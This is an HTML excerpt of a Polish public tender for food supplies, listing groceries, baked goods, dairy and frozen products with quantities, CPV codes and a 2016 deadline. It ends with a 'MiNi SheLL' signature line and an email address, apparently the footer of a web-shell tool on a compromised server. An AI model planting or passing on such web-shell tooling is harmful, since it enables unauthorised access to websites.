19	DŻEM NISKOSŁODZONY PASTERYZOWANY BEZ KONSERWANTÓW, różne smaki truskawkowy, morelowy, brzoskwiniowy, owoce leśne,czarna porzeczka, wsad owocowy min. 40g owoców w 100g produktu, opakowanie słoik 280 - 320g	szt	15
20	GAŁKA MUSZKATAŁOWA, opakowanie 50-100g	szt.	10
21	GOŹDZIKI, przyprawa 15-20g	szt.	30
22	GROSZEK KONSERWOWY opakowanie puszka 400-410g  typu KRAKUS	szt.	25
23	Chrupki kukurydziane 150g	szt.	100
24	HERBATA CZARNA 100%, granulowana WYSOKOGATUNKOWA TYPU LIPTON YELLOW LABEL, opakowanie szt	szt.	25
25	HERBATA EKSPRESOWA CZARNA 100% TYPU SAGA, opakowanie 100 saszetek	szt.	50
26	HERBATA EKSPRESOWA, WYSOKOGATUNKOWA, OWOCOWA, TYPU LIPTON PIRAMIDKI, opakowanie 25 saszetek	szt.	50
27	HERBATA EKSPRESOWA MIĘTA, opakowanie 20-25 saszetek	szt.	50
28	HERBATA EKSPRESOWA OWOCOWA, TYPU SAGA, torebki, opakowanie 20-25  sztuk, różne smaki do wyboru: leśna, owocowa, malinowa.	szt	100
29	HERBATNIKI TYPU PETIT BEURRE, opakowanie 100-120g	szt.	300
30	KAKAO CIEMNE EXTRA typu DeCo Morrena, opakowanie 80-100g	szt.	10
31	KASZA GRYCZANA  średnio palona opakowanie 1000g	kg	100
32	KASZA JAGLANA opakowanie 1000g	kg	20
33	KASZA JĘCZMIENNA biała perłowa łamana średnia, opakowanie 1000g	kg	60
34	KASZA JĘCZMIENNA pęczak, opakowanie 1000g	kg	50
35	KASZA KUKURYDZIANA, typu SANKO, opakowanie 350g	szt.	50
36	KASZA KUSKUS, opakowanie 300-400g	szt.	50
37	KASZA MANNA BŁYSKAWICZNA, opakowanie 1000g	kg	100
38	KAWA ROZPUSZCZALNA ZBOŻOWA typu Inka, opakowanie 150-200g	szt.	10
39	KETCHUP ŁAGODNY TYPU PUDLISZKI, do którego produkcji zużyto nie mniej niż 120g pomidorów do przygotowania 100g produktu gotowego do spożycia, opakowanie 450-480g	szt.	100
40	KONCENTRAT POMIDOROWY opakowanie słoik 1000g, pasteryzowany, zawartość ekstraktu 30%, bez konserwantów TYPU PUDLISZKI	szt.	150
41	KUKURYDZA  KONSERWOWA,opakowanie puszka 400-460g	szt.	25
42	KURKUMA, opakowanie torebka 10-15g	szt.	20
43	KWASEK CYTRYNOWY opakowanie 20-25g	szt.	50
44	LIŚCIE LAUROWE opakowanie 100g	szt.	20
45	LIZAKI WIELOSMAKOWE TYPU CHUPA CHUPS, zawierające min. 3% puree owocowego	szt.	100
46	MAJERANEK SUSZONY opakowanie 200 - 250g	szt.	15
47	MAJONEZ DEKORACYJNY TYPU WINIARY, min. zawartość żółtek 0,6%, bez konserwantów, opakowanie słoik 400 - 450g	szt.	10
48	MAKARON LASAGNE TYPU LUBELLA, opakowanie 500g,  wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	10
49	MAKARON KOKARDKI TYPU LUBELLA NR 51, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	30
50	MAKARON ŁAZANKI TYPU LUBELLA NR 46, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 330 kcal, nie sklejający się	szt.	20
51	MAKARON MUSZELKI TYPU LUBELLA NR 26, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	100
52	MAKARON PEŁNOZIARNISTY MUSZELKI TYPU LUBELLA NR 26, opakowanie 400-500g, z mąki razowej, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	20
53	MAKARON NITKI TYPU LUBELLA NR 49, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	30
54	MAKARON SPAGHETTI TYPU LUBELLA NR 4, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	50
55	MAKARON ŚWIDERKI TYPU LUBELLA NR 19, opakowanie 500g, wartość energetyczna w 100g suchego produktu min. 340 kcal, nie sklejający się	szt.	100
56	MAKARON PEŁNOZIARNISTY ŚWIDERKI TYPU LUBELLA NR 19, opakowanie 500g, z mąki razowej, nie sklejający się	szt.	50
57	MAKARON ORKISZOWY TYPU LUBELLA, opakowanie 500g, z mąki orkiszowej nie sklejający się 	szt.	30
58	MAKARON ZACIERKA TYPU LUBELLA, opakowanie 200-250g, jajeczny (jaja min. 5,5%), wartość energetyczna w 100g suchego produktu min. 355 kcal	szt.	100
59	MĄKA PSZENNA SZYMANOWSKA TYP 480, opakowanie papierowe 1000g	szt.	500
60	MĄKA ZIEMNIACZANA, opakowanie 1000g	szt.	100
61	MĄKA ŻYTNIA RAZOWA TYP 2000 , 900G - 1000 G	szt.	100
62	MIGDAŁY W PŁATKACH, opakowanie 100 - 120g	szt.	20
63	MIÓD NATURALNY PSZCZELI, wielokwiatowy nektarowy, opakowanie słoik 400 - 450g, BEZ DODATKÓW CUKRU I SUBSTANCJI SŁODZĄCYCH zdefiniowanych w rozporządzeniu WE nr 1333 2008	szt.	20
64	MORELE SUSZONA, opakowanie 750-800g 	szt.	20
65	MUSLI LO BEZ DODATKU CUKRU Z OWOCAMI, 300G	szt.	50
66	MUSZTARDA TYPU FRANCUSKA, opakowanie 200ml	szt.	15
67	MUSZTARDA TYPU SAREPSKA, opakowanie szklane 200-260g	szt.	5
68	NATURALNA WODA MINERALNA, niegazowana lub gazowana, średniozmineralizowana, opakowanie butelka plastikowa 1500ml	szt.	500
69	OCET SPIRYTUSOWY, 500ml  	szt.	5
70	OLEJ RZEPAKOWY typu kujawski, z pierwszego tłoczenia, opakowanie 1-3 litry	litr	500
71	OLIWA Z PESTEK WINOGRON z pierwszego tłoczenia, opakowanie 700-750ml	szt.	24
72	OLIWA Z OLIWEK z pierwszego tłoczenia, opakowanie 700-750ml	szt.	24
73	OLIWKI BEZ PESTEK-opakowanie słoik  500-1000 ml	szt.	20
74	OREGANO SUSZONE, opakowanie 15g	szt.	60
75	ORZECHY LASKOWE, łuskane, opakowanie 150-200g	szt.	30
76	ORZECHY WŁOSKIE, łuskane, opakowanie 150-200g	szt.	30
77	PAPRYKA MIELONA SŁODKA, kolor intensywnie czerwony, opakowanie 20-25g 	szt.	10
78	PESTKI SŁONECZNIKA ŁUSKANE, opakowanie 100-150g	szt.	50
79	PIEPRZ CZARNY MIELONY, opakowanie 10-15g	szt.	200
80	PIEPRZ ZIOŁOWY, opakowanie 20-25g	szt.	15
81	PŁATKI JĘCZMIENNE błyskawiczne, opakowanie 400g	szt.	150
82	PŁATKI KUKURYDZIANE DO MLEKA, zawartość kukurydzy min. 98%) bez dodatku substancji słodzących zdefiniowanych w rozporządzeniu WE nr 1333 2008, opakowanie 220-300g	szt.	150
83	PŁATKI OWSIANE GÓRSKIE BŁYSKAWICZNE, wartość energetyczna w 100g produktu min. 360 kcal, opakowanie 400-500g	szt.	150
84	PŁATKI RYŻOWE BŁYSKAWICZNE, wartość energetyczna w 100g produktu min. 360 kcal, opakowanie 400-500g	szt.	150
85	POMIDORY SUSZONE NA SŁOŃCU  w zalewie 290-300g	szt.	10
86	PROSZEK DO PIECZENIA opakowanie 15-20g	szt.	5
87	PRZECIER POMIDOROWY, robiony z samych pomidorów, bez substancji konserwujących%, opakowanie słoik lub karton 190-200g	szt. 	100
88	PRZYPRAWA DO ZUP TYPU MAGGI, opakowanie butelka 1000ml	szt.	2
89	RODZYNKI SUŁTAŃSKIE, opakowanie 250-300g	szt.	50
90	RYZ PARABOLICZNY SYPKI, opakowanie 5000g	kg	150
91	RYŻ BIAŁY DŁUGOZIARNISTY SYPKI, opakowanie torba papierowa 1000g, wartość energetyczna w 100g produktu min. 344 kcal	kg	50
92	SOCZEWICA, opakowanie 200-250g	szt.	20
93	SZAFRAN, przyprawa, opakowanie 10-15g	szt.	10
94	SEZAM ZIARNO, opakowanie 200g	szt.	50
95	SŁOMKA PTYSIOWA, opakowanie 100g	szt.	80
96	SOCZEK 100% W KARTONIKU DLA DZIECI, jabłkowy, pomarańczowy, opakowanie 200-250ml ze słomką, zawierający nie więcej niż 10g cukrów w 100g/ml produktu gotowego do spożycia	szt.	300
97	SOK JABŁKOWY ŚWIEŻO TŁOCZONY bezpośrednio z całych owoców bez dodatku cukru i substancji słodzących, pasteryzowany, opakowanie  5000ml	szt.	60
98	SOK JABŁKOWO-GRUSZKOWY ŚWIEŻO TŁOCZONY bezpośrednio z całych owoców bez dodatku cukru i substancji słodzących, pasteryzowany, opakowanie  5000ml	szt.	60
99	SOK JABŁKOWO-MARCHWIOWY ŚWIEŻO TŁOCZONY bezpośrednio z całych owoców i warzyw bez dodatku cukru i substancji słodzących, pasteryzowany, opakowanie  5000ml	szt.	200
100	SÓL JODOWANA opakowanie 1000g	kg	30
101	SZCZAW KONSERWOWY, opakowanie słoik 250-300g	szt.	50
102	ŚLIWKA SUSZONA, opakowanie 750-800g 	szt.	50
103	TUŃCZYK W SOSIE WŁASNYM, kawałki, konserwa rybna, 180-200g	szt.	25
104	TYMIANEK, opakowanie 10-15g	szt.	50
105	WODA MINERALNA NIEGAZOWANA z ustnikiem,  300- 500 ml 	szt.	300
106	ZIELE ANGIELSKIE, opakowanie pet 600g	szt.	1
107	ZIOŁA PROWANSALSKIE, opakowanie torebka 10-15g	szt.	150
108	ŻELKI ZŁOTY MIŚ typu HARIBO, opakowanie 100g	szt.	100
109	PESTKI Z DYNI ŁUSKANE, opakowanie 150-250g	szt.	50
110	PŁATKI ORKISZOWE, opakowanie 300g	szt.	50
111	WAFLE KUKURYDZIANE, naturalne typu KUPIEC, opakowanie 130g	szt.	350
112	WAFLE RYŻOWE Z PEŁNEGO ZIARNA RYŻU BRĄZOWEGO, opakowanie 130g	szt.	350
113	ŻUREK - NATURALNY ZAKWAS KONCENTRAT BARSZCZU opakowanie SZKLANE	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	BABECZKA ŚMIETANKOWA, o obniżonej zawartości cukru, waga 1 sztuki 75-80g	szt.	200
2	CIASTO DROŻDŻOWE, z mąki pszennej typu 500, z rodzynkami i kruszonką, bez konserwantów i polepszaczy, waga 500g	szt	100
3	CIASTO JABŁECZNIK, z mąki pszennej typu 500, bez konserwantów i polepszaczy, o obniżonej zawartości cukru, dostawa z blachy	kg	50
4	CIASTO SERNIK, z mąki pszennej typu 500, bez konserwantów i polepszaczy, dostawa z blachy	kg	50
5	DROŻDŻÓWKA Z NADZIENIEM, różne nadzienia, świeże, waga 1 szt. 80-100g	szt.	200
6	MINI PĄCZKI, BEZ NADZIENIA, bez lukru	kg	15
7	PĄCZKI LUKROWANE, nadziewane marmoladą, waga 80-100g	szt.	150
8	ROGALIKI BABUNI, nadziewane marmoladą, świeże, bez lukru, dostawa w kilogramach	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	JOGURT NATURALNY, GĘSTY, OPAKOWANIE  150G	szt.	1500
2	JOGURT OWOCOWY , z kawałkami owoców, zawartość owoców min.9%, opakowanie 120-130g	szt.	400
3	JOGURT NATURALNY, gęsty, opakowanie plastikowe, 370g	szt.	100
4	JOGURT TYPU GRECKI, zagęszczony, opakowanie plastikowe 400g	szt.	100
5	MASŁO EXTRA, opakowanie 200g,  min. 82% tłuszczu, bez dodatku tłuszczów roślinnych 	szt.	900
6	MLEKO 2% UHT, długoterminowe, w kartonie, opakowanie 1000ml	szt.	1500
7	MLEKO 2%, pasteryzowane, homogenizowane, opakowanie folia 1000ml	szt.	2100
8	NAPÓJ SOJOWY-op. 1l	szt.	100
9	SER ŻÓŁTY (GOUDA/EDAM/RYCKI), łagodny o zawartości tłuszczu 45%, zawartość sera min. 90%, pakowany w bloki 1000-1500g	kg	200
10	SEREK TYPU MASCARPONE, opakowanie 150-200g	szt.	5
11	ŚMIETANA 18%, opakowanie 400ml 	szt.	600
12	TWAROŻEK HOMOGENIZOWANY, NATURALNY,  opakowanie 150g	szt.	100
13	TWARÓG PÓŁTŁUSTY, klasa 1, opakowanie folia o pojemności 250-500g, zawartość tłuszczu 3,5-5%	kg	450.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	FRYTKI PROSTE/KARBOWANE, mrożone, opakowanie 2500g	kg	20
2	MROŻONKA BROKUŁY (różyczki), opakowanie 2500g	kg	75
3	MROŻONKA BORÓWKA AMERYKAŃSKA, opakowanie 500g	kg	40
4	MROŻONKA BRZOSKWINIA KROJONA KOSTKA, opakowanie 500g	kg	40
5	MROŻONKA BRUKSELKA  opakowanie 2500g	kg	10
6	MROŻONKA BUKIET WARZYW, zawiera brokuły, marchew, kalafior, opakowanie 2500g	kg	40
7	MROŻONKA CHIŃSKA, zawiera min. kukurydzę, paprykę, cebulę, kiełki bambusa, marchew, seler, opakowanie 2500g	kg	10
8	MROŻONKA CZARNA PORZECZKA, opakowanie 2500g	kg	25
9	MROŻONKA FASOLKA SZPARAGOWA ZIELONA/ŻÓŁTA, cięta, oczyszczona, opakowanie 2500g	kg	50
10	MROŻONKA GROSZEK ZIELONY, opakowanie 2500g	kg	70
11	MROŻONKA KALAFIOR (różyczki), opakowanie 2500g	kg	50
 	MROŻONKA KUKURYDZA (ziarna) opakowanie 2500g	kg	50
12	MROŻONKA MARCHEW KOSTKA, opakowanie 2500g	kg	50
13	MROŻONKA MARCHEWKA MINI, opakowanie 2500g	kg	50
14	MROŻONKA MIESZANKA KOMPOTOWA, opakowanie 2500g	kg	30
15	MROŻONKA MORELA KROJONA KOSTKA, opakowanie 500g	kg	40
16	MROŻONKA SZPINAK LIŚCIE, opakowanie 2500g	kg	10
17	MROŻONKA SZPINAK, rozdrobniony, brykiet, opakowanie 2500g	kg	40
18	MROŻONKA ŚLIWKI BEZ PESTEK, opakowanie 2500g	kg	20
 	MROŻONKA WIŚNIE BEZ PESTEK, opakowanie 2500g	kg	40
19	MROŻONKA TRUSKAWKA, bez szypułek, opakowanie 2500g	kg	150
20	MROŻONKA WARZYWA NA PATELNIĘ, głęboko zamrożone, opakowanie foliowe 2500g	kg	50
21	MROŻONKA ZUPA JARZYNOWA, zawiera min. kalafior, marchew, fasolkę, brukselkę, opakowanie 2500g	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com